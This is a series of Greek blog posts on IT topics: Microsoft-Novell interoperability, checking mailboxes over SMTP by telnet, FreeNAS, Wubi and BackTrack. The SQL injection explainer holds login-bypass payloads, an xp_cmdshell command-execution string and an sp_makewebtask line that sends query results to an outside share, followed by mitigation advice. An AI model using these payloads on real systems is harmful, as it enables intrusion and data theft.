    Σε αυτό το κομμάτι, οι δύο εταιρείες είχαν αρχικά συμφωνήσει προσκολλήσουν στο standard του WSMan πρωτοκόλλου για την διαχείριση συστημάτων (Systems Management). Έτσι και οι δύο εταιρείες χρησιμοποίησαν το παραπάνω standard για server monitoring αντίστοιχα στα Microsoft System Center Operations Manager και της Novell το Zenworks Management Platform. Αλλά αυτό δεν είναι το σημείο στο οποίο πρέπει να μείνουμε, καθώς από το 2008 δημιουργήθηκε το Linux Management Pack (download) από την Novell για να εγκατασταθεί μαζί με το System Center της Microsoft. Καλό ε; Έτσι με αυτό το πακέτο, μέσω του System Center ο admin θα μπορούσε να παρακολουθήσει 7 κύρια service όπως: Samba, Bind/DNS, DCHP, LDAP, CUPS, Firewall, και NFS. Φυσικά ο περιορισμός του συγκεκριμένου πακέτου είναι ότι επίσημα υποστηρίζει μόνο SUSE Linux.

    Identity and Federation
    Στο συγκεκριμένο κομμάτι, η συνεργασία των δύο εταιρειών έγινε πραγματικότητα μέσω των Active Directory Federation Service της Microsoft και του Access Manager της Novell. Και τα δύο αυτά προϊόντα συνεργάζονται μέσω των WS Federation Protocols, συμπεριλαμβανομένων και των WS Trust and WS Security. Με αυτό το μοντέλο οι πελάτες μπορούν να εκμεταλλευτούν εφαρμογές όπως το Microsoft SharePoint ή κάποια άλλα. Η προσπάθεια που γίνεται αυτή την στιγμή είναι η δημιουργία ενός πακέτου που θα επεκτείνει το SharePoint και σε περιβάλλοντα που δεν χρησιμοποιούν Active Directory.

    Moonlight
    Ακόμα ένα πράγμα που έχετε διαβάσει σε αυτό το blog, έχει να κάνει με την δημιουργεία του moonlight, που δεν είναι τίποτα άλλο από την δυνατότητα ύπαρξης του Silverlight στο Linux. Η συνεργασία σε αυτό το κομμάτι, έφερε το Silverlight και στους open source Browsers. Πλέον το Moonlight 2 είναι διαθέσιμο.
    Office Format Compatibility
    Επίσης ένας τομέας που έχει συζητηθεί και σε αυτό το blog, οπότε δεν θα επεκταθώ και έχει να κάνει με την συμβατότητα του Open Office και του MS Office και των format που αυτά χρησιμοποιούν. Προσωπικά πιστεύω ότι έχουν γίνει βήματα σωστά, αλλά υπάρχουν ακόμα αρκετά να γίνουν ώστε να μπορεί κάποιος να μιλήσει για πλήρης συμβατότητα.
    Accesibility Collaboration
    Ένα project το οποίο είναι εν εξελίξει και θα επιτρέπει το UIA (User Interface AUtomation) framework να λειτουργεί αρμονικά μέσα στα Linux Accessibility Projects.
    Επίλογος
    Η συνεργασία των δύο προχωράει και από αυτά που έχουν συμφωνηθεί, έχουμε και άλλα να δούμε. Περισσότερες από 475 μεγάλες εταιρείες παγκοσμίως βρίσκονται στο interop-πελατολόγιo των MS & Novell. Τα πράγματα προχωράνε προς αυτή την κατεύθυνση και οι σκληροπυρηνικοί linuxάδες απλά θα πρέπει να ξεκινήσουν να νιώθουν λίγο καλύτερα με την MS ή M$ όπως συνήθως την γράφουν. Όπως και να έχει το πράγμα, μην ξεχνάμε ότι όλα είναι business και τουλάχιστον εμείς οι χρήστες είμαστε αυτοί που έχουμε κέρδος από κάτι σαν και αυτό.
    Τα σχόλια; Δικά σας…
  5. Blackman
    Πρόσφατα αναζητούσα τον λόγο γιατί ένας υπολογιστής φαινόταν να μην έχει στείλει κάποια emails, παρόλο που φαινόντουσαν ότι είχαν φύγει. Το πρώτο πράγμα που ρώτησα τον χρήστη είναι το αν θα μπορούσαμε να στείλουμε δοκιμαστικό email και μετά να πάρουμε και ένα τηλέφωνο επιβεβαίωσης. Ο συνάδελφος μου είπε ότι κάτι τέτοιο δεν πρέπει να γίνει για πολλούς και διάφορους λόγους.
    Οπότε πριν ξεκινήσω να ελέγχω οτιδήποτε θα έπρεπε να ελέγξω αν αυτές οι 5 διευθύνσεις που μου έδωσε ο χρήστης είναι valid και χωρίς να στείλω email. Τα πράγματα είναι απλά και γίνονται με την χρήση της εντολής nslookup και την χρήση telnet.
    ΠΩΣ ΓΙΝΕΤΑΙ;
    Αρχικά πρέπει να βρούμε τον mail exchange του domain που μας ενδιαφέρει.
    Οπότε αν μιλάμε για ένα email λογαριασμό [email protected]
    τότε θα πρέπει να γράψουμε
    nslookup -q=mx blackdomain.com
    η απάντηση που θα πάρουμε θα πρέπει να είναι της μορφής…
    blackdomain.com MX preference = 10, mail exchanger = mail.blackdomain.com
    mail.blackdomain.com internet address = 208.96.53.76

    Στην συνέχεια συνδεόμαστε στον mail server mail.blackdomain.com
    telnet mail.blackdomain.com 25
    και πέρνουμε απάντηση τύπου…
    220 mail.blackdomain.com ESMTP Postfix NO UCE NO UEMA C=US L=CA Unsolicated electronic mail advertisements strictly prohibited, subject to fine under CA law CBPC 17538.45. This electronic mail service provider’s equipment is located in the State of California. See http://www.blackdomain.com/static/inbound-email-policy.html for more information.
    συνεχίζουμε και μιλάμε με το σύστημα γράφοντας…
    helo hi
    και παίρνουμε απάντηση τύπου…
    250 mail.blackdomain.com

    στην συνέχεια ελέγχουμε αν το σύστημα μπορεί να δεχτεί email από συγκεκριμένη διεύθυνση…
    mail from: [email protected]
    με απάντηση…
    250 2.1.0 Ok
    Οπότε μετά μπορούμε να ρωτήσουμε αν υπάρχει το mailbox που ψάχνουμε…
    rcpt to: [email protected]

    με απάντηση (αν δεν υπάρχει ή κάτι σχετικό):
    550 5.1.1 [email protected]: Recipient address rejected: User unknown in local recipient table.
    και μετά κλείνουμε την σύνδεση με την εντολή quit.
    ΠΑΡΑΤΗΡΗΣΕΙΣ:
    1) Το νούμερο 550 σημαίνει ότι η διεύθυνση συντακτικά είναι σωστή, αλλά λάθος σαν ύπαρξη mailbox.
    2) Εάν υπάρχει ο συγκεκριμένος λογαριασμός τότε η απάντηση δεν θα έδινε 550, αλλά 250.
    3) Ο συγκεκριμένος τρόπος δεν ενδείκνυται για χρήση σε gmail ή yahoo ή ότι άλλο τέτοιου τύπου, καθώς η IP σας μπορεί να καταλήξει σε κάποια blacklist.

    Ελπίζω να φανεί και σε άλλους χρήσιμο.
  6. Blackman
    Από αυτό εδώ το Blog έχω αναφέρει στο παρελθόν την δυνατότητα του να κάνουμε ένα linux μηχάνημα join σε ένα domain ή ακόμα και να στήσουμε domain έχοντας ως DC ένα linux server. Η πραγματικότητα όμως είναι λίγο διαφορετική, καθότι το πιο πιθανόν (σε υλοποίηση με linux server) που μπορεί να αντιμετωπίσουμε είναι ένα Microsoft domain, με κάποιον άλλο linux server (πιθανότατα email server ή κάποιος application server ή database server MySQL) να υπάρχει στο δίκτυο. Οι πιθανότητες να μην είναι έτσι είναι λίγες.

    Φυσικά, υπάρχουν και περιπτώσεις που εμείς οι διαχειριστές ενός δικτύου, θέλουμε να βάλουμε ένα μηχάνημα Linux ή Mac στο δίκτυο μας, είτε για δοκιμές, είτε για να διευρύνουμε τις δυνατότητες που μας δίνονται. Σε περιπτώσεις εταιρειών που χρησιμοποιούν κατά κόρον Mac λόγο σχεδιαστικών και λοιπών προγραμμάτων σίγουρα υπάρχει ένα θέμα όσον αφορά τις λύσεις που υπάρχουν για να μπουν αυτά τα μηχανήματα στο domain, αλλά και να μπορεί κάποιος να εφαρμόσει κάποιες πολιτικές. Σε επίπεδο Mac ο φίλτατος costasppc προφανώς έχει περισσότερες γνώσεις, οπότε ότι αναφέρω σε αυτό το άρθρο ίσως να ξέρει και άλλες εναλλακτικές.

    Το θέμα μας, σε αυτή την περίπτωση είναι απλό. Έχω βάλει ή θέλω να βάλω κάποια linux μηχανάκια στο δίκτυο μου και ακόμα ένα δύο Mac, αλλά παρόλο που έχω την δυνατότητα να τα κάνω join στο Domain, δεν θέλω να μπορούν να κάνουν ότι να ναι, αλλά να μπορώ να στείλω κάποιες πολιτικές δικτύου, ώστε να μου κάνουν την ζωή ποιο εύκολη. Αν το ψάξετε στο Internet, θα δείτε ότι υπάρχουν λύσεις για αυτό το πρόβλημα.

     

    Μία τέτοια λύση είναι και η λύση της Likewise. Η συγκεκριμένη εταιρεία δίνει την δυνατότητα να κατεβάσετε τον Likewise Group Policy Agent ο οποίος με την σειρά του κάνοντας τον εγκατάσταση στο σύστημα σας ουσιαστικά διευρύνει τις επιλογές της MMC group policy κονσόλας, προσθέτοντας επιλογές που έχουν να κάνουν με Linux ή Mac. Αντίστοιχα ο ίδιος ο Agent τρέχει και στα μηχανήματα που θέλουμε ώστε να γίνουν apply αυτές οι πολιτικές.

    Έτσι μέσα σε όλα έχουμε την δυνατότητα να εκτελέσουμε κάποια πολιτική με την χρήση sudo (superuser do) και ουσιαστικά με αυτό τον τρόπο να ελέγχουμε πλήρως τα linux λειτουργικά. Αλλά δεν είναι μόνο αυτά... Ως γνωστόν, τα linux distributions είναι αρκετά και το καλό του συγκεκριμένου είναι ότι μας γίνει και την δυνατότητα να επιλέξουμε για ποιο distro αναφέρετε η συγκεκριμένη πολιτική.



    Με αυτό το εργαλείο λοιπον, μπορεί ο οποιοσδήποτε να διαχειριστεί ένα Mixed περιβάλλον, όπως θα έκανε και με ένα καθαρά Microsoft. Δυστυχώς το παραπάνω δεν είναι δωρεάν αλλά πρέπει να το αγοράσετε, αλλά υπάρχει η δυνατότητα να το κατεβάσετε σαν demo για να δείτε τι ακριβώς κάνει.

    Ενδιαφέροντα links για να δείτε είναι τα εξής:

    How to Create and Test a Sudo Policy for Linux and Unix

    Active Directory Group Policy for Unix

     

    Αντίστοιχες λύσεις με τη παραπάνω υπάρχουν φυσικά και παρακάτω είναι κάποιες από αυτές:

    Centrify DirectControl

    Vintela Group Policy

     

    Το συγκεκριμένο δεν είναι κάποια καινούρια τεχνολογία, αλλά υφίσταται τα τελευταία χρόνια. Η αλλαγή στάσης της Microsoft απέναντι στα Open Source λογισμικά, επέτρεψε και σε εργαλεία όπως τα παραπάνω να γίνουν ακόμα περισσότερο λειτουργικά και με λιγότερες επιπλοκές στην χρήση τους. Interoperability...made easy...
  7. Blackman
    Ένα σύστημα φτιαγμένο για να κάνει αυτό που λέει.

    Να μετατρέπει ένα οποιοδήποτε σύστημα με ίδιους δίσκους επάνω και χωρίς την χρήση κάποιου controller, παρά μόνο του συγκεκριμένου συστήματος, σε Network-attached Storage.

    Παρακάτω μπορείτε να δείτε μία παρουσίαση (screencast) του συγκεκριμένου συστήματος σε εικονικό περιβάλλον και σε χρήση με το host μηχάνημα που είναι σε Windows Vista Ultimate 64bit. Η συγκεκριμένη linux λύση λειτουργεί απροβλημάτιστα σε οποιοδήποτε τύπου δικτύου μπει, είτε αυτό είναι ένα workgroup ή domain Microsoft, είτε linux ή κάποιο mixed mode.

    ΚΑΤΕΒΑΣΤΕ ΤΟ ΒΙΝΤΕΟ (διάρκειας 22 λεπτών)

    ΔΕΙΤΕ ΤΟ ONLINE

    Θα σας το σύστηνα ανεπιφύλακτα να το βάλετε στο σπίτι ή στην δουλειά, μετατρέποντας ένα παλιό PC σε NAS με κόστος μόνο τους δίσκους (ίσως και κάποια έξτρα κάρτα δικτύου). Φυσικά δεν πρόκειται να αντικαταστήσει επαγγελματικές λύσεις, αλλά σίγουρα είναι μία πολύ ωραία εναλλακτική για backup σύστημα.

     

    Η σελίδα του συστήματος είναι η http://www.freenas.org/

    και το σύστημα μπορείται να το κατεβάσετε από ΕΔΩ (διαλέξτε μεταξύ Live CD - Standard Image - VMware Image).

    Υ.Γ. Συγχωρέστε με για όποια λάθη. Η παρουσίαση έγινε στις 1 το πρωί.

    Ελπίζω να σας αρέσει
  8. Blackman
    Τι θα λέγατε αν σας έλεγα ότι υπάρχει τρόπος να κάνετε εγκατάσταση Ubuntu Linux ΜΕΣΑ στα Windows;
     
    Εγκατάσταση λειτουργικού μέσα σε άλλο λειτουργικό; Πως;
    Με την χρήση του Wubi.
     
    To Wubi είναι ένας βολικός και εύκολος τρόπος για τους χρήστες των Microsoft Windows να δοκιμάσουν το Linux.
    Έτσι χρήστες με όχι πολλές γνώσεις, μπορούν με αυτό τον τρόπο να εξερευνήσουν το Ubuntu χωρίς ιδιαίτερο κόπο.
     
    Υπέρ:

    Εγκατάσταση όπως οποιουδήποτε άλλου προγράμματος Δεν χρειάζονται αλλαγές στα partitions Free για να το κατεβάσεις & χωρίς άδειες χρήσης Κατά:

    Το Downloading μπορεί να αργήσει λίγο Από default το Wubi δεν κατεβάζει τις τελευταίες εκδόσεις του Linux συστήματος Η εγκατάσταση του Linux συστήματος γίνετε σαν ένα αρχείο με αποτέλεσμα να υπάρχει μειωμένη απόδοση Βήματα - παρατηρήσεις

    Απλή εγκατάσταση στα Windows Το κατεβάζεις και το εκτελείς με απλό διπλό κλικ Το Wubi κατεβάζει και εγκαθιστά το Ubuntu και το εγκαθιστά σαν δεύτερη επιλογή κατά το boot Τα αρχεία του Linux σώζονται σε ένα αρχείο των Windows Μετά την πρώτη εγκατάσταση το λειτουργικό κάνει επανεκκίνηση και επιλέγει το Ubuntu για να ξεκινήσει Μετά από αυτό το σύστημα ολοκληρώνει την εγκατάσταση, εφόσον ο χρήστης απαντήσει σε κάποιες ερωτήσεις για την παραμετροποίηση του αρχικού λογαριασμού Ο χρήστης πλέον επιλέγει λειτουργικό όταν ξεκινάει το σύστημα Πέραν του συστήματος αρχείων, το Linux δουλεύει κανονικά και όχι ως εξομοίωση Μπορεί να το δουλέψει πλήρες και να κάνει ότι εγκατάσταση θέλει free προγραμμάτων μέσα από το το Synaptic (αντίστοιχο του add/remove programs) Εγκατάσταση 

    Κατεβάστε το πρόγραμμα από το wubi-installer.org
    Κατεβάστε το αρχείο σε ένα φάκελο Διπλό κλικ για να ξεκινήσει η εγκατάσταση
    Βάλτε username & password Κάντε επανεκκίνηση και περιμένετε να ολοκληρωθεί η εγκατάσταση από το Ubuntu Κάντε επανεκκίνηση και επιλέξτε το Ubuntu
    Ή διαλέξτε τα Windows με τον ίδιο τρόπο
    Σε περίπτωση που θέλετε να κάνετε απεγκατάσταση του Ubuntu, γίνετε όπως όλα τα υπόλοιπα προγράμματα μέσω του Add or Remove Programms Για τους χρήστες που είναι καινούριοι στον κόσμο του Linux, αυτός είναι ένας πολύ εύκολος τρόπος για να έρθουν σε επαφή χωρίς να μπλέκουν με partitions που για το linux είναι διαφορετικού τύπου (ext2, ext3 κλπ) και όχι fat ή ntfs.
     
    Αξίζει να το δοκιμάσετε.
     
    (το Wubi υπάρχει πάνω από ένα χρόνο, αλλά αρκετός κόσμος αγνοεί την ύπαρξη του...)


    Requirements

    256 MB memory

    5 GB harddisk space

    Windows 98, 2000, XP, Vista

     
     
  9. Blackman
    Δεν έκανα λάθος. Δεν είναι η ταινία Back to the Future. Είναι η πραγματικότητα "Back to the Track". Το είχαμε αναφέρει σε αυτό το Blog στο παρελθόν. Ένα εργαλείο που αξίζει να ασχοληθούν όσοι έχουν την όρεξη καθώς οι πληροφορίες που μπορεί κάποιος να αντλήσει είναι πολλές και ενδιαφέρουσες.

    Το Backtrack 3, όπως κάθε σωστή διανομή ή λειτουργικό σύστημα που σέβεται τον εαυτό του, κάνει τον κύκλο του, "πεθαίνει" και "ξαναζεί".



    Το Backtrack 4 Pre-Final ήρθε και σε λίγο καιρό έρχεται και η τελική έκδοση του συστήματος. Προσωπικά δουλεύω την beta λίγο καιρό τώρα (δεν έχω δει την Pre-Final ακόμα). Τα περισσότερα εργαλεία που εμπεριέχονται έχουν αναβαθμιστεί στις τελευταίες εκδόσεις και αναμένεται το ίδιο να ισχύει και στην τελική έκδοση. Υπάρχουν κάποια θεματάκια ακόμα, όπως κάποιο debugging που πρέπει να γίνει πχ στο 0trace για να δουλέψει σωστά, αλλά η κοινότητα του Backtrack είναι εδώ για να βοηθήσει και σίγουρα η final version θα δουλεύει απροβλημάτιστα. Όσοι έχουν δουλέψει με την προηγούμενη έκδοση, να είναι έτοιμοι για καλύτερα αποτελέσματα σε όλες τις δοκιμές ή μετρήσεις που θα κάνουν.



    Αν και η αλήθεια είναι ότι λίγοι έχουν την σωστή εικόνα του Backtrack και πολλοί το διαφημίζουν ως εργαλείο για σπάσιμο ασύρματων δικτύων, που ουσιαστικά και αυτό είναι κάτι που μπορεί να γίνει από οπουδήποτε, λόγο ότι χρησιμοποιεί το aircrack. Ένας σωστός penetration tester ή security specialist πρέπει να το έχει από κοντά.

    Κατεβάστε το

    ISO (Pre-Final)

    VM (beta)

    BackTrack 4 - The Definitive Guide

    coming soon...


  10. Blackman
    Ξεκινάω το συγκεκριμένο post για να δείτε πως γίνεται το hack που ονομάζεται SQL Injection, καθώς επίσης και διάφοροι τρόποι που προτείνονται για να αποφευχθεί κάτι τέτοιο και διάφορα άλλα. Σκοπός μου είναι να δώσω την εικόνα του συγκεκριμένου hack, αλλά αν θέλετε να μάθετε να το κάνετε θα πρέπει να το ψάξετε περισσότερο μόνοι σας.

    Τι είναι SQL Injection attack

    Όπως μπορείτε να βρείτε και στο Wikipedia, μιλάμε για μία τεχνική η οποία εκθέτει αδυναμίες στην ασφάλεια (security vulnerability exploit) μίας βάσης δεδομένων. Η συγκεκριμένη ‘τρύπα’ έχει να κάνει με το τρόπο που φιλτράρονται οι χρήστες ή γιατί τα usernames δεν είναι strongly typed. Οι επιθέσεις αυτές είναι επίσης γνωστές και ως SQL Insertion attacks.

    Μόλις ο hacker αποκτήσει πρόσβαση, τότε μπορεί να εκτελέσει ότι query θέλει πάνω στην βάση δεδομένων. Συνεπώς και να τραβήξει ή να αλλάξει όποια πληροφορία θέλει.

    SQL Injection FAQ

    Ε:Τι χρειάζεται κάποιος για να κάνει την παραπάνω επίθεση;

    Α:Απλά έναν web browser.

     

    Ε:Τι πρέπει να ψάξει για να κάνει κάποιος τη συγκεκριμένη επίθεση;

    Α:Σελίδες που επιτρέπουν την εισαγωγή δεδομένων όπως login page, search page, feedback κλπ. Μερικές φορές ακόμα και HTML σελίδες χρησιμοποιούν POST εντολές για να στείλουν τις σχετικές παραμέτρους σε κάποια σελίδα ASP. Οπότε σε αυτή την περίπτωση δεν θα δείτε τις παραμέτρους αυτές στην URL, αλλά μόνο αν ελέγξετε τον source code και ψάξετε και βρείτε το σημείο “FORM” μέσα στον κώδικα πχ

    <FORM action=Search/search.asp method=post>
    <input type=hidden name=A value=C>
    </FORM>

    Οτιδήποτε υπάρχει μεταξύ FORM & /FORM είναι πιθανές παράμετροι που θα μπορεί κάποιος να χρησιμοποιήσει.

     

    Ε:Τι γίνεται αν δεν βρίσκουμε σελίδα που να δέχεται εισαγωγή δεδομένων;

    A:Θα πρέπει να ψάξετε σελίδα ASP, JSP, CGI ή PHP. Αυτό που θα πρέπει να ψάχνει κάποιος είναι σελίδες όπως:

    http://autoexec.gr/index.asp?id=10

     

    E:Πως θα δοκιμάσουμε αν υπάρχει ‘τρύπα’

    A:Δοκιμάστε να γράψετε hi' or 1=1--

    αυτό μπορεί να είναι στο Login, στο Password ή ακόμα και την URL

    πχ http://autoexec.gr/index.asp?id=hi' or 1=1--

     

    E:Αλλά γιατί ' or 1=1--;

    Α:Πέραν του ότι μπορεί να γίνει bypass το login, είναι πιθανόν να δει κάποιος επιπλέον πληροφορίες που συνήθως δεν είναι διαθέσιμες. Αν πχ παμε σε μία σελίδα που έχει link σε μία άλλη σελίδα όπως http://autoexec.gr/index.asp?category=hardware

    Βλέπουμε ότι στο URL η μεταβλητή είναι το category, ενώ το hardware είναι η τιμή για την μεταβλητή. Αυτό που πλευρά κώδικα θα εμπεριέχει κώδικα σαν και τον παρακάτω:

    v_cat = request(“category")

    sqlstr=”SELECT * FROM hardwr WHERE PCategory=’” & v_cat & “’”

    set rs=conn.execute(sqlstr)

    Έτσι με το παραπάνω το SQL που ουσιαστικά αντιστοιχεί τον συγκεκριμένο κώδικα μπορεί να γίνει:

    SELECT * FROM hardwr WHERE PCategory=’hardware’

    όπου το query θα φέρει πίσω αποτελέσματα για το hardware.

    Οπότε σε αυτή την περίπτωση αν πάρουμε το url

    http://autoexec.gr/index.asp?category=hardware' or 1=1--

    Τώρα η μεταβλητή v_cat αντιστοιχεί στο "hardware' or 1=1--", οπότε αν το βάλουμε αυτό σε SQL query, θα έχουμε

    SELECT * FROM hardwr WHERE Pcategory=’hardware’ or 1=1--‘

    Τι έχουμε σε αυτή την περίπτωση; Ότι το query θα μας φέρει τα πάντα από τον πίνακα hardwr ασχέτως αν είναι ίσο με το hardware ή όχι. Η διπλή παύλα (--) λέει στον MS SQL server να αγνοήσει το υπόλοιπο query, το οποίο με την σειρά του θα παρατήσει το τελευταίο quote (‘). Μερικές φορές η διπλή παύλα μπορεί να αντικατασταθεί με το σύμβολο της δίεσης (#).

    Παρόλα αυτά όμως, αν δεν είναι SQL server ή δεν μπορείς (ή δεν θες) να αγνοήσεις το υπόλοιπο query, μπορούμε επίσης να δοκιμάσουμε να βάλουμε

    ‘ or 'a'='a

    Οπότε το SQL query θα γίνει:

    SELECT * FROM hardwr WHERE PCategory=’hardware’ or ‘a’=’a’

    Και θα έχουμε το ίδιο αποτέλεσμα.

    Αντίστοιχα μπορείτε να δοκιμάσετε

    ‘ or 1=1--

    “ or 1=1--

    or 1=1--

    ‘ or ‘a’=’a

    “ or “a”=”a

    ‘) or (‘a"=‘a

     

    E:Μπορώ να αποκτήσω δυνατότητα απομακρυσμένη εκτέλεσης με SQL Injection;

    Α:Οι χρήστες SQL και δη οι developers, γνωρίζουν ότι ο SQL είναι ένα πολύ δυνατό εργαλείο και αυτό γιατί τους δίνει την δυνατότητα να κάνουν ΤΑ ΠΑΝΤΑ σε ένα σύστημα. Έτσι, επειδή ο SQL Server τρέχει σαν SYSTEM, αυτό σημαίνει ότι τα δικαιώματα που έχει είναι επιπέδου administrator στο σύστημα. Οπότε εύκολα από την στιγμή που μπορούμε να τρέξουμε ότι θέλουμε, με την χρήση stored procedures (που είσαι Αντώνη

    '; exec master..xp_cdmshel ‘ping 10.10.1.2'--

    Σε περίπτωση που το μονό quote δεν δουλεύει, χρησιμοποιήστε διπλό.

    Το ερωτηματικό στην αρχή (η semi colon όπως το λένε στα ξένα) θα τερματίσει το SQL query που εκτελείται εκείνη την ώρα και θα μας επιτρέψει να ξεκινήσουμε μία νέα εντολή SQL. Για την επιβεβαίωση ότι η εντολή εκτελέστηκε σωστά μπορούμε να πάρουμε απάντηση από ping στην IP για να δούμε αν υπάρχει κάποιο πακέτο από τον server:

    #tcpdump icmp

    Αν δεν πάρουμε απάντηση από το Ping (που λέγετε Pong), και έχουμε μήνυμα λάθους που σχετίζεται με δικαιώματα, τότε πιθανόν ο administrator έχει περιορίσει την εκτέλεση των stored procedures στον Web User.

     

    E:Πως μπορώ να πάρω το αποτέλεσμα του query μου;

    Α:Με την χρήση του sp_makewebtask:

    '; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMAS.TABLES"

    αλλά να έχετε υπόψη ότι ο φάκελος SHARE που θα βρίσκεται στην IP που θέλουμε πρέπει να έχει sharing pemissions σε Everyone.

     

    Φυσικά υπάρχουν απαντήσεις και σε άλλα ερωτήματα όπως να πάρουμε αποτελέσματα από μία βάση με την χρήση μηνυμάτων λάθους από ODBC ή πως να τραβήξουμε όλα τα ονόματα στηλών από ένα πίνακα, ή πως τραβάμε ότι data θέλουμε, πως να βάλουμε δικά μας data κλπ

    Οπότε καταλαβαίνετε ότι η όλη διαδικασία είναι μεγάλη και φυσικά άμεσα συνδεδεμένη με αυτό που κάνει και ένας developer. Αν για κάποιους δεν σας λένε τίποτα, σίγουρα για άτομα όπως ο Αντώνης του λένε πολλά.

    Αν θέλετε να μάθετε περισσότερα για SQL Injection δείτε τα παρακάτω…

    http://projects.webappsec.org/SQL-Injection

    http://msdn.microsoft.com/en-us/library/ms161953.aspx

    http://net.tutsplus.com/articles/can-you-hack-your-own-site-a-look-at-some-essential-security-considerations/

    http://en.wikipedia.org/wiki/SQL_injection

    http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/#LineCommentAttacks

    http://geniushackers.com/blog/2009/04/08/sql-injection-ultimate-method-for-website-hacking/



     

    ΠΩΣ ΑΠΟΦΕΥΓΟΥΜΕ SQL INJECTIONS.

    Αν διαβάσετε τα παραπάνω θα πάρετε και μία εικόνα για το πρέπει να κάνετε ώστε να αποφύγετε τι ‘κακοτοπιές’ και συνεπώς να μην πέσετε θύμα μίας επίθεσης με SQL Injection. Αλλά θα αναφέρω και κάποια πράγματα και εγώ.

    Φροντίστε να ‘βγάλετε’ (εσείς ή κάποιος developer) εκτός χαρακτήρες όπως quotes, slash, backslash, semi colon, NULL, new line, κλπ και αυτά πρέπει να βγουν από τα εξής:

    1) εισαγωγή από χρήστες σε πεδίο

    2) παραμέτρους στην URL

    3) Τιμές από cookies

    Επίσης κάτι άλλο που προτείνεται είναι το να βεβαιωθείτε ότι όλα τα νούμερα έχουν μετατραπεί σε integer. Επίσης διαγράψτε stored procedures που δεν σας αρέσουν και δεν χρειάζεστε όπως master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask .

     

    ΓΕΝΙΚΑ ΣΥΜΠΕΡΑΣΜΑΤΑ

    Η χρήση SQL Injection καταλαβαίνετε ότι δεν είναι κάτι απλό. Είναι πιθανότατα ένα από τους πιο δυνατούς τρόπους για να κάνει κάποιος hacking και επίσης είναι ο πιο απλός καθώς δεν χρειάζεται ιδιαίτερα εργαλεία, αλλά μονάχα ένας web browser. Από εκεί και πέρα αν κάποιος έχει τις απαραίτητες γνώσεις μπορεί να αποκτήσει πλήρης πρόσβαση στο μηχάνημα, πέραν από τα δεδομένα που μπορεί να έχει η βάση δεδομένων. Αυτό που καταφέρνει να κάνει κάποιος ουσιαστικά είναι να ‘κοροϊδέψει το σύστημα και να του δώσει όλες τις πληροφορίες που ζητάει, και καταλαβαίνετε εύκολα ότι αν το συγκεκριμένο attack συνδυαστεί με Google Hacking η ζωή του επίδοξου hacker γίνεται ακόμα πιο εύκολη.

    Ελπίζω με το παραπάνω να πήρατε μία εικόνα για το τι είναι αυτή η μορφή επίθεσης, οπότε να πάρετε και τα μέτρα σας (όσοι χρειάζεται).

     

    Επιπλέον Links

    http://www.digitaloffense.net/wargames01/IOWargames.ppt
    http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
    http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
    http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf

    http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6

    http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc

    http://www.owasp.org/asac/input_validation/sql.shtml

    http://www.sensepost.com/misc/SQLinsertion.htm
  11. Blackman
    Χαμηλώστε τον φωτισμό...

    βάλτε την πιο 'χακεροκομπιουτερίστικη' διάθεση σας...το πονηρό κρυμένο χαμόγελο που έχετε...και ελάτε να μπούμε μαζί στον κόσμο του Backtrack.



    To backtrack είναι ένα Linux λειτουργικό σύστημα, βασισμένο στο Slackware και το οποίο είναι διαθέσιμο για χρήση άμεσα διότι μιλάμε για ένα λειτουργικό που τα έχει όλα εγκατεστημένα και είναι Live.



    To remote-exploit.org χαρακτηρίζει το Backtrack ως "BackTrack is the most top rated linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-Rom and is fully accessible within minutes."

    Θέλετε κάτι άλλο από αυτό; Για να κάνετε ότι δοκιμές θέλετε, να τεστάρετε ότι θέλετε και να δοκιμάσετε τις γνώσεις σας όπου θέλετε;

    Α ναι...θέλετε και κάτι άλλο.Να σας δείξω τι καλούδια θα βρείτε μέσα.

    Ρίξτε μία ματιά στην φωτογραφία που ακολουθεί:



    Αυτή που βλέπετε είναι η τελευταία έκδοση του Backtrack (3) και είναι final.

    Αναλυτικά τα εργαλεία που υπάρχουν, με ανάλυση του τι είναι το καθένα μπορείτε να τα βρείτε ΕΔΩ (ΔΕΙΤΕ ΤΗΝ ΟΠΩΣ ΚΑΙ ΔΗΠΟΤΕ)

    Μιλάμε για 30 προγράμματα Information Gathering, 30 προγράμματα Network Mapping, 65 προγράμματα Valnerability Identification, 12 προγράμματα Penetration, 48 προγράμματα Privilege Escalation, 16 προγράμματα maintaining access, 25 προγράμματα για ασύρματα δίκτυα (WiFi - Radio Network Analysis), 22 προγράμματα για bluetooth (bluetooth - Radion Network Analysis), 7 προγράμματα VOIP & Telephony Analysis, 13 προγράμματα Digital Forensics, 7 προγράμματα Reverse Engineering και επίσης καμιά 15 προγράμματα που δεν είναι σε κάποια κατηγορία. (συνολικά 290+ προγράμματα)



    Φυσικά δεν χρειάζετε να αναφέρουμε, ότι είναι έτοιμο το σύστημα και στις υπόλοιπες κατηγορίες προγραμμάτων. Αφού θα βρείτε από το SKYPE, μέχρι OCR πρόγραμμα. Προσωπικά το θεωρώ καταπληκτικό σύστημα, καθότι απλά τα έχει όλα. Ως διαχειριστές συστημάτων, μπορείτε να κάνετε πολλές δοκιμές στο σύστημα σας και να δείτε πάρα μα πάρα πολλές πληροφορίες, εφόσον τα προγράμματα που έχει καλύπτουν όλο το φάσμα λειτουργιών μίας εταιρείας ασχέτως του λειτουργικού, τοπολογίας ή όποιας πολυπλoκότητας.

    ΚΑΤΕΒΑΣΤΕ ΤΟ BACKTRACK ΤΩΡΑ!!!! (EINAI ...IT PRO MUST HAVE)

    USB version & VMWare version

    μπορείτε να το τρέξετε είτε ως Live CD, αλλά είτε να το κάνετε εγκατάσταση από το σχετικό κουμπί που έχει για αυτό τον σκοπό μέσα στο λειτουργικό.

    Για τον τρόπο χρήσης του κάθε προγράμματος θα πρέπει να ψάξετε λίγο στο internet (πιστέψτε με, για το κάθε ένα υπάρχει αναλυτικός οδηγός χρήσης), από εκεί και πέρα, λίγο χρόνο να βρείτε και όρεξη για να "παίξετε" με το Backtrack και σίγουρα θα γίνετε και εσείς ένας από τους φανατικούς οπαδούς του (στους χιλιάδες που υπάρχουν ήδη).

